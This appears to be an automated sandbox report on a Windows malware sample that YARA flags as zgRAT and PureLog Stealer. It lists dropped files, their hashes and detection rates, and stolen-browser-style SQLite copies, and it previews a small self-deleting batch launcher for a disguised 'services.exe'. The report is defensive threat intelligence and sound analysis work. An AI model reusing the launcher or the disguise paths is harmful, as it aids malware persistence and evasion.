                                                              MD5:ADAE028E0A5A72D219A02BB06D92241A
                                                              SHA1:7CAE683F773D541BD5C76CE6491CCB2F2F05C08A
                                                              SHA-256:3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
                                                              SHA-512:FE8EF741DE45A6BDE2B48322EF33EE9662B0CBC4CAABB582F405850CB0AB58D286E96C5E28E47A0968B17BAE6874F938973D6ED7F27E6A9DB3A16ED0B63AA1E6
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\conhost.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\conhost.exe, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 74%
                                                              Joe Sandbox View:
                                                              • Filename: 9FwQYJSj4N.exe, Detection: malicious, Browse
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):10393088
                                                              Entropy (8bit):3.7593823756442295
                                                              Encrypted:false
                                                              SSDEEP:98304:w4nrXaOTm08kwmLyo/0YwWXWkcftzkmaGHBXRaLWUJDCU:w4rXbm08oLSYwuWkcfCmPXRaLLVCU
                                                              MD5:ADAE028E0A5A72D219A02BB06D92241A
                                                              SHA1:7CAE683F773D541BD5C76CE6491CCB2F2F05C08A
                                                              SHA-256:3AC51E8FC3AA517AEA4640EFAFFA1B04301C14DC876104E09AB9B7A3A95A0415
                                                              SHA-512:FE8EF741DE45A6BDE2B48322EF33EE9662B0CBC4CAABB582F405850CB0AB58D286E96C5E28E47A0968B17BAE6874F938973D6ED7F27E6A9DB3A16ED0B63AA1E6
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\dllhost.exe, Author: Joe Security
                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\dllhost.exe, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 74%
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1698
                                                              Entropy (8bit):5.367720686892084
                                                              Encrypted:false
                                                              SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4x
                                                              MD5:2C0A3C5388C3FAAFA50C8FB701A28891
                                                              SHA1:D75655E5C231DE60C96FD196658C429E155BEB0F
                                                              SHA-256:A44CB861DDF882F48202B95D3A8A535419C1AE0386666C84B803F9810473EDD7
                                                              SHA-512:0343301C34ED4FEB7EFF30186862EBC7446E6044955B3088B0BE0D86A3DACAE1BFC407A59D385E9CBB7A0DEF210DC3405FD442A598FD28431371E249F748258A
                                                              Malicious:true
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.6732424250451717
                                                              Encrypted:false
                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5707520969659783
                                                              Encrypted:false
                                                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.5712781801655107
                                                              Encrypted:false
                                                              SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                              MD5:05A60B4620923FD5D53B9204391452AF
                                                              SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                              SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                              SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\Desktop\XNPOazHpXF.exe
                                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):168
                                                              Entropy (8bit):5.174464547122643
                                                              Encrypted:false
                                                              SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mVqdei5zNHovBktKcKZG1Ukh4E2J5xAI2A/xq:hCRLuVFOOr+DEAdF5zVovKOZG1923fXE
                                                              MD5:BD30DFCA97C0C3CF30FEDEED74C2022D
                                                              SHA1:AA4EFFE7AA4F514607124B1D519E2F5728F4D357
                                                              SHA-256:F9F1EF84D249AA9992F222DDFFEB037FBAF4DE43C97F74D93DAAEFFB02DFE33D
                                                              SHA-512:3243406478DFA98FEC7AD2AF26EE923BD6FD04CA8155F76FE5AE4A4FE53217F621959E02F3A7378DDF20BBCB7827ECE7BD0D884A2C68C036992A0C4898929E05
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\InputMethod\CHT\services.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\1kuSaYZZpb.bat"
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                              Category:dropped
                                                              Size (bytes):106496
                                                              Entropy (8bit):1.136413900497188
                                                              Encrypted:false
                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):51200
                                                              Entropy (8bit):0.8746135976761988
                                                              Encrypted:false
                                                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.121297215059106
                                                              Encrypted:false
                                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                              Category:dropped
                                                              Size (bytes):20480
                                                              Entropy (8bit):0.8439810553697228
                                                              Encrypted:false
                                                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                              Malicious:false
                                                              Process:C:\Windows\InputMethod\CHT\services.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                              Category:dropped
                                                              Size (bytes):40960
                                                              Entropy (8bit):0.8553638852307782
                                                              Encrypted:false
                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                              Malicious:false
